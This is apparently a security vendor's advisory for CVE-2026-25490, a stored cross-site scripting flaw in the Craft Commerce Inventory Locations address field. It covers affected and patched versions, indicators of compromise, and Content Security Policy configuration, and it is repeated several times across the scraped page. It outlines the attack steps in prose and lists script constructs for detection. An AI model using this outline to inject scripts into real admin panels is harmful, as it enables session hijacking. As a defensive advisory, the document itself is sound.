CVE-2026-25490: Craft Commerce Stored XSS Vulnerability

CVE-2026-25490 Overview

A stored Cross-Site Scripting (XSS) vulnerability has been identified in Craft Commerce, the ecommerce platform for Craft CMS. This vulnerability allows attackers to execute malicious JavaScript code in an administrator's browser by injecting unsanitized input into the 'Address Line 1' field within Inventory Locations. When an administrator views the affected page in the admin panel, the malicious script executes within their authenticated session context.

Critical Impact
Attackers with access to Inventory Location settings can inject persistent malicious scripts that execute in administrator browsers, potentially leading to session hijacking, administrative action manipulation, or further compromise of the Craft CMS installation.

Affected Products

Craft Commerce versions 4.0.0-RC1 through 4.10.0
Craft Commerce versions 5.0.0 through 5.5.1
Craft CMS installations utilizing vulnerable Craft Commerce versions

Discovery Timeline

2026-02-03 - CVE-2026-25490 published to NVD
2026-02-04 - Last updated in NVD database

Technical Details for CVE-2026-25490

Vulnerability Analysis

This stored XSS vulnerability (CWE-79) exists due to improper input sanitization in the Craft Commerce admin panel. The 'Address Line 1' field within the Inventory Locations feature fails to properly encode or sanitize user-supplied input before rendering it in the administrative interface. When an attacker with sufficient privileges to edit Inventory Locations enters malicious JavaScript code into this field, the payload is stored in the database and subsequently executed in the browser context of any administrator who views the affected page.

Stored XSS vulnerabilities are particularly dangerous because the malicious payload persists on the server and can affect multiple users over time without requiring social engineering to trick users into clicking malicious links.

Root Cause

The root cause of this vulnerability is insufficient output encoding in the Craft Commerce admin panel templates. The 'Address Line 1' field value is rendered directly into the HTML response without proper escaping or sanitization, allowing JavaScript code embedded in the field to be interpreted as executable content by the browser. This represents a failure in implementing proper output encoding practices when displaying user-controlled data.

Attack Vector

The attack is network-based and requires an attacker to have authenticated access with privileges to modify Inventory Location settings. The attack flow proceeds as follows:

An attacker with access to the Craft Commerce admin panel navigates to the Inventory Locations configuration
The attacker enters a malicious JavaScript payload in the 'Address Line 1' field (e.g., <script> tags or event handlers)
The payload is stored in the application database
When any administrator subsequently views the Inventory Locations page, the malicious script executes in their browser
The script can then perform actions such as stealing session cookies, modifying administrative settings, or redirecting to phishing pages

Due to the passive user interaction requirement, the vulnerability requires an administrator to view the affected page for successful exploitation. For additional technical details, see the GitHub Security Advisory GHSA-wq2m-r96q-crrf.

Detection Methods for CVE-2026-25490

Indicators of Compromise

Unusual or suspicious content in the 'Address Line 1' field of Inventory Locations containing HTML tags or JavaScript code
Database entries in inventory location tables containing <script>, onerror, onload, or similar HTML/JavaScript constructs
Administrator session anomalies or unauthorized actions following visits to the Inventory Locations page
Web application logs showing unusual POST requests to Inventory Location endpoints with encoded script content

Detection Strategies

Implement Content Security Policy (CSP) headers to detect and prevent inline script execution, with reporting enabled
Deploy Web Application Firewall (WAF) rules to detect XSS payloads in form submissions to administrative endpoints
Enable audit logging for all changes to Inventory Location records and review for suspicious patterns
Use browser-based XSS detection tools or security extensions during admin panel usage

Monitoring Recommendations

Monitor for changes to Inventory Location records, particularly the address fields
Set up alerts for Content Security Policy violations in your logging infrastructure
Conduct periodic database audits scanning for potential XSS payloads in user-input fields
Review administrator session activity for anomalous behavior following admin panel access

How to Mitigate CVE-2026-25490

Immediate Actions Required

Upgrade Craft Commerce 4.x installations to version 4.10.1 or later immediately
Upgrade Craft Commerce 5.x installations to version 5.5.2 or later immediately
Audit existing Inventory Location records for any suspicious or malicious content in address fields
Review administrator account activity for signs of compromise

Patch Information

Craft CMS has released patched versions that address this stored XSS vulnerability. The fix implements proper output encoding for the 'Address Line 1' field before rendering in the admin panel.

Affected Version Range	Patched Version
4.0.0-RC1 to 4.10.0	4.10.1
5.0.0 to 5.5.1	5.5.2

For detailed patch information, see the GitHub commit. Release notes are available at v4.10.1 and v5.5.2.

Workarounds

If immediate patching is not possible, restrict access to Inventory Location management to only trusted administrators
Implement strict Content Security Policy headers to mitigate XSS impact (though this does not fix the underlying vulnerability)
Manually audit and sanitize any existing Inventory Location address fields for malicious content
Consider temporarily disabling or limiting access to the Inventory Locations feature until patches can be applied

bash

# Configuration example - Implement Content Security Policy headers in your web server
# For Apache (.htaccess or httpd.conf):
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';"

# For Nginx (nginx.conf):
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';";

CVE-2026-25490 Overview

Critical Impact
Attackers with access to Inventory Location settings can inject persistent malicious scripts that execute in administrator browsers, potentially leading to session hijacking, administrative action manipulation, or further compromise of the Craft CMS installation.

Affected Products

Craft Commerce versions 4.0.0-RC1 through 4.10.0
Craft Commerce versions 5.0.0 through 5.5.1
Craft CMS installations utilizing vulnerable Craft Commerce versions

Discovery Timeline

2026-02-03 - CVE-2026-25490 published to NVD
2026-02-04 - Last updated in NVD database

Technical Details for CVE-2026-25490

Vulnerability Analysis

Root Cause

Attack Vector

The attack is network-based and requires an attacker to have authenticated access with privileges to modify Inventory Location settings. The attack flow proceeds as follows:

An attacker with access to the Craft Commerce admin panel navigates to the Inventory Locations configuration
The attacker enters a malicious JavaScript payload in the 'Address Line 1' field (e.g., <script> tags or event handlers)
The payload is stored in the application database
When any administrator subsequently views the Inventory Locations page, the malicious script executes in their browser
The script can then perform actions such as stealing session cookies, modifying administrative settings, or redirecting to phishing pages

Detection Methods for CVE-2026-25490

Indicators of Compromise

Unusual or suspicious content in the 'Address Line 1' field of Inventory Locations containing HTML tags or JavaScript code
Database entries in inventory location tables containing <script>, onerror, onload, or similar HTML/JavaScript constructs
Administrator session anomalies or unauthorized actions following visits to the Inventory Locations page
Web application logs showing unusual POST requests to Inventory Location endpoints with encoded script content

Detection Strategies

Implement Content Security Policy (CSP) headers to detect and prevent inline script execution, with reporting enabled
Deploy Web Application Firewall (WAF) rules to detect XSS payloads in form submissions to administrative endpoints
Enable audit logging for all changes to Inventory Location records and review for suspicious patterns
Use browser-based XSS detection tools or security extensions during admin panel usage

Monitoring Recommendations

Monitor for changes to Inventory Location records, particularly the address fields
Set up alerts for Content Security Policy violations in your logging infrastructure
Conduct periodic database audits scanning for potential XSS payloads in user-input fields
Review administrator session activity for anomalous behavior following admin panel access

How to Mitigate CVE-2026-25490

Immediate Actions Required

Upgrade Craft Commerce 4.x installations to version 4.10.1 or later immediately
Upgrade Craft Commerce 5.x installations to version 5.5.2 or later immediately
Audit existing Inventory Location records for any suspicious or malicious content in address fields
Review administrator account activity for signs of compromise

Patch Information

Craft CMS has released patched versions that address this stored XSS vulnerability. The fix implements proper output encoding for the 'Address Line 1' field before rendering in the admin panel.

Affected Version Range	Patched Version
4.0.0-RC1 to 4.10.0	4.10.1
5.0.0 to 5.5.1	5.5.2

For detailed patch information, see the GitHub commit. Release notes are available at v4.10.1 and v5.5.2.

Workarounds

If immediate patching is not possible, restrict access to Inventory Location management to only trusted administrators
Implement strict Content Security Policy headers to mitigate XSS impact (though this does not fix the underlying vulnerability)
Manually audit and sanitize any existing Inventory Location address fields for malicious content
Consider temporarily disabling or limiting access to the Inventory Locations feature until patches can be applied

bash

# Configuration example - Implement Content Security Policy headers in your web server
# For Apache (.htaccess or httpd.conf):
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';"

# For Nginx (nginx.conf):
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline';";

CVE-2026-25490: Craft Commerce Stored XSS Vulnerability

CVE-2026-25490 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-25490

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-25490

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-25490

Immediate Actions Required

Patch Information

Workarounds

Experience the World’s Most Advanced Cybersecurity Platform

CVE-2026-25490: Craft Commerce Stored XSS Vulnerability

CVE-2026-25490 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-25490

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-25490

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-25490

Immediate Actions Required

Patch Information

Workarounds

Experience the World’s Most Advanced Cybersecurity Platform